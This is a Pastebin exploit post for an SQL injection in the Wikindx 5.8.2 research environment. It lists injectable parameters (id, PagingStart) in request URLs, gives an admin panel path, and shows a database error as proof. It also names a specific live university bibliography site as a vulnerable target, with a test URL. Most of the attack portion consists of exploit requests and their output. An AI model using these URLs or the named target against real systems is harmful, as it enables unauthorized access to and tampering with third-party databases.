KingSkrupellos

Wikindx 5.8.2 Virtual Research Environment SQL Injection

Aug 22nd, 2019
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.41 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Wikindx 5.8.2 Virtual Research Environment Library Manager SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 23/08/2019
  7. # Vendor Homepage : wikindx.sourceforge.net
  8. # Software Download Link : sourceforge.net/projects/wikindx/files/latest/download
  9. # Software Version : 5.x - 5.8.2
  10. # Tested On : Windows and Linux
  11. # Category : WebApps
  12. # Exploit Risk : Medium
  13. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  14. Special Elements used in an SQL Command ('SQL Injection') ]
  15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  18.  
  19. ###################################################################
  20.  
  21. # Description about Software :
  22. ***************************
  23. Wikindx is a free Virtual Research Environment (an online bibliographic and
  24. quotations/notes management and article authoring system) designed either
  25. for single use (on a variety of operating systems) or multi-user collaborative
  26. use across the internet.
  27.  
  28. ###################################################################
  29.  
  30. # Impact :
  31. ***********
  32. Wikindx 5.8.2 Virtual Research Environment Library Manager is prone to an
  33. SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data
  34. before using it in an SQL query. Exploiting this issue could allow an attacker to
  35. compromise the application, access or modify data, or exploit latent vulnerabilities
  36. in the underlying database. A remote attacker can send a specially crafted request
  37. to the vulnerable application and execute arbitrary SQL commands in a
  38. pplication`s database. Further exploitation of this vulnerability may result in
  39. unauthorized data manipulation. An attacker can exploit this issue using a browser
  40. or with any SQL Injector Tool.
  41.  
  42. ###################################################################
  43.  
  44. # Admin Panel Login Path :
  45. *************************
  46. /index.php?action=usersgroups_MYWIKINDX_CORE
  47.  
  48. # SQL Injection Exploit :
  49. **********************
  50. /index.php?action=list_LISTSOMERESOURCES_CORE&method=categoryProcess&id=[SQL Injection]&type=lastMulti
  51.  
  52. /index.php?action=list_LISTSOMERESOURCES_CORE&method=categoryProcess&id=[ID-NUMBER]&PagingStart=[SQL Injection]
  53.  
  54. /index.php?action=list_LISTSOMERESOURCES_CORE&method=categoryProcess&id=1&PagingStart=[SQL Injection]
  55.  
  56. ###################################################################
  57.  
  58. # Example Vulnerable Sites :
  59. *************************
  60. Germany Bonn University BOBC Bonner Online-Bibliographie zur Comicforschung is vulnerable for SQL Injection.
  61.  
  62. [+] bobc.uni-bonn.de/index.php?action=list_LISTSOMERESOURCES_CORE&method=categoryProcess&id=1&PagingStart=1%27
  63.  
  64. ###################################################################
  65.  
  66. # Example SQL Database Error :
  67. ****************************
  68. Fatal error: You have an error in your SQL syntax; check the
  69. manual that corresponds to your MariaDB server
  70. version for the right syntax to use near 'LIMIT 0, 100' at line
  71. 1 in /var/www/wikindx5/core/sql/SQL.php on line 2839
  72.  
  73. ###################################################################
  74.  
  75. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  76.  
  77. ###################################################################
Add Comment
Please, Sign In to add comment